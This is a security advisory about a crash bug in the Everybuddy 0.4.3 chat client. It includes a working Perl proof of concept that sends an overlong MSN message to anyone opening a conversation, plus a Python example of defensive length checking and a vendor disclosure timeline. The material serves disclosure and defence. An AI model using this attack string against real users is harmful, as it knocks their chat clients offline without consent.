Everybuddy Vulnerable to a DoS Attack (Long Message)

Summary

Everybuddy is a chat client that supports the AIM, ICQ, MSN, Yahoo! and Jabber protocols. The program contains a security vulnerability that allows remote attackers to crash it by sending an overly long instant message.

Credit:

The information has been provided by Noam Rathaus and SecurITeam Experts.


Details

Vulnerable systems:
 * Everybuddy version 0.4.3

Exploit:
The exploit code logs in as a user, waits for someone to open a conversation with that user, and then sends them the attack string.

#!/usr/bin/perl
use strict;
use warnings;

use MSN; # from http://www.adamswann.com/library/2002/msn-perl/

# Per-user FIFO of messages waiting for a conversation to open.
my %queue;

my $client = MSN->new();
$client->connect('email address', 'password', '', {
    Status  => \&Status,
    Answer  => \&Answer,
    Message => \&Message,
    Join    => \&Join }
);

sub Status {
   my ($self, $username, $newstatus) = @_;

   print "Status() called with parameters:\n";
   print ' ' . join(',', @_), "\n";

   # Print the status change info.
   print "${username}'s status changed from " . $self->buddystatus($username) . " to $newstatus.\n";

   # The line opening this block was lost when the advisory was published;
   # the condition here is an assumption (skip buddies that have just gone
   # offline, MSN status code FLN).
   if ($newstatus ne 'FLN') {
      # Initiate the call.
      $self->call($username);

      # The call may take a few seconds to complete, so we can't
      # immediately send messages. Let's put the message in a
      # FIFO (queue) that is keyed by username.
      push (@{$queue{$username}}, 'Glad to see you online!');
   }

}

sub Message {
   my ($self, $username, undef, $msg) = @_;

   print "Message() called with parameters:\n";
   print ' ' . join(',', @_), "\n";

}

sub Join {
   my ($self, $username) = @_;

   print "Join() called with parameters:\n";
   print ' ' . join(',', @_), "\n";

   # See if there's anything queued up.
   # Deliver each message if there is stuff in the queue for this user.
   while ($_ = shift @{$queue{$username}}) {
      $$self->sendmsg($_);
   }
}

sub Answer {
   my ($self, $username) = @_;

   print "Answer() called with parameters:\n";
   print ' ' . join(',', @_), "\n";

   # Send the attack string: 27 'A's followed by a carriage return, repeated 55 times.
   $$self->sendmsg("AAAAAAAAAAAAAAAAAAAAAAAAAAA\r" x 55);

}
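The advisory does not say where inside Everybuddy the long message causes the crash, but the defensive counterpart to the attack string above is to bound an inbound message on its declared length before anything is allocated, copied or rendered for it, and to drop control characters before the text reaches the UI. The following Python is an added example and is not Everybuddy's code nor the msn-perl library's; the frame shape `MSG <sender> <nick> <length>\r\n<payload>` is a simplified stand-in for the MSN protocol's MSG command (the MIME headers that normally precede the body are omitted), the 1024-byte cap is an assumed policy value, and all sample frames are constructed.

```python
import re

# Assumed policy cap in bytes; a real client would derive this from the
# protocol's documented maximum or from its own display limits.
MAX_MESSAGE_BYTES = 1024

# Simplified frame: "MSG <sender> <nick> <length>\r\n<payload>" (MIME headers omitted).
# The length field is capped at nine digits so int() can never be fed a huge number.
HEADER_RE = re.compile(rb"^MSG (\S+) (\S+) (\d{1,9})\r\n")


class MessageTooLong(ValueError):
    pass


class MalformedFrame(ValueError):
    pass


def parse_msg_frame(buf: bytes, max_bytes: int = MAX_MESSAGE_BYTES):
    """Return (sender, nick, payload), or raise before the payload is touched."""
    m = HEADER_RE.match(buf)
    if not m:
        raise MalformedFrame("missing or malformed MSG header")
    sender, nick = m.group(1).decode(), m.group(2).decode()
    declared = int(m.group(3))
    # The check is on the *declared* length, so an oversized message is
    # refused before any buffer for it is allocated or copied.
    if declared > max_bytes:
        raise MessageTooLong(f"declared {declared} bytes exceeds cap of {max_bytes}")
    body = buf[m.end():m.end() + declared]
    if len(body) != declared:
        raise MalformedFrame(f"expected {declared} payload bytes, got {len(body)}")
    return sender, nick, body


def sanitize_text(body: bytes) -> str:
    """Decode and drop control characters; the attack string is one CR per 28 bytes."""
    text = body.decode("utf-8", errors="replace")
    return "".join(ch for ch in text if ch in "\t\n" or ord(ch) >= 0x20)


def handle_frame(buf: bytes, max_bytes: int = MAX_MESSAGE_BYTES):
    """Dispatcher: ('ok', sender, text) or ('rejected', reason, None)."""
    try:
        sender, _nick, body = parse_msg_frame(buf, max_bytes)
    except MessageTooLong as exc:
        # Log and drop; the conversation stays open and the client stays up.
        return ("rejected", f"too long: {exc}", None)
    except MalformedFrame as exc:
        return ("rejected", f"malformed: {exc}", None)
    return ("ok", sender, sanitize_text(body))


# Constructed sample frames (not captured traffic).
NORMAL_FRAME = b"MSG alice@example.com Alice 5\r\nhello"
# Payload modeled on the advisory's attack string: 27 'A's + CR, 55 times = 1540 bytes.
ATTACK_PAYLOAD = (b"A" * 27 + b"\r") * 55
ATTACK_FRAME = b"MSG mallory@example.com Mallory %d\r\n" % len(ATTACK_PAYLOAD) + ATTACK_PAYLOAD

if __name__ == "__main__":
    for frame in (NORMAL_FRAME, ATTACK_FRAME):
        print(handle_frame(frame))
```

The important ordering is that `parse_msg_frame` rejects on the header's length field before slicing the body: a client that first copies the payload into a fixed-size buffer and only then looks at its size has already done the dangerous work. Raising the cap (for example `handle_frame(ATTACK_FRAME, max_bytes=2000)`) shows the second layer, where the CRs are stripped before display.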

Vendor status:
After numerous attempts to contact the vendor (in some cases the vendor replied, but then disappeared again), we are forced to release this information without having received a proper response from them.

Disclosure timeline:
19/06/2003 – First attempt to contact vendor
20/06/2003 – First vendor response
22/06/2003 – PoC provided to vendor
01/07/2003 – Second attempt to contact vendor
01/08/2003 – Third attempt to contact vendor
05/08/2003 – Public advisory
